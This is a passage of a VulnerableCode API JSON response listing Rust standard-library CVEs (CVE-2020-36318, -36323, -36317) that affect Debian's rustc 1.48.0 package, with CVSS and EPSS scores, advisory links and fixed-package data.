"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949192", "reference_id": "1949192", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949192" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1804", "reference_id": "AVG-1804", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:1935", "reference_id": "RHSA-2021:1935", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:1935" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:2243", "reference_id": "RHSA-2021:2243", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:2243" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2020-36318" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wdu6-3vph-aqb7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80677?format=api", "vulnerability_id": "VCID-wpe1-jr23-duhh", "summary": "rust: optimization for joining strings can cause uninitialized bytes to be exposed", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36323", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72059", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72186", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72182", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72191", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72065", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72086", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72062", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72099", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72111", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72134", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72118", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72104", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72145", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72152", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00705", "scoring_system": "epss", "scoring_elements": "0.72138", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36323" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950396", "reference_id": "1950396", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950396" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2020-36323" ], "risk_score": 3.7, "exploitability": "0.5", "weighted_severity": "7.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wpe1-jr23-duhh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80831?format=api", "vulnerability_id": "VCID-y25s-c64z-57a6", "summary": "rust: memory safety violation in String::retain()", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36317", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50792", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5083", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50862", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5087", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50847", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50873", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50831", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50886", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50928", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50907", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50914", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-36317" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949189", "reference_id": "1949189", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949189" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1804", "reference_id": "AVG-1804", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:1935", "reference_id": "RHSA-2021:1935", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:1935" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:2243", "reference_id": "RHSA-2021:2243", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:2243" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2020-36317" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y25s-c64z-57a6" } ], "fixing_vulnerabilities": [], "risk_score": "4.4", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2" }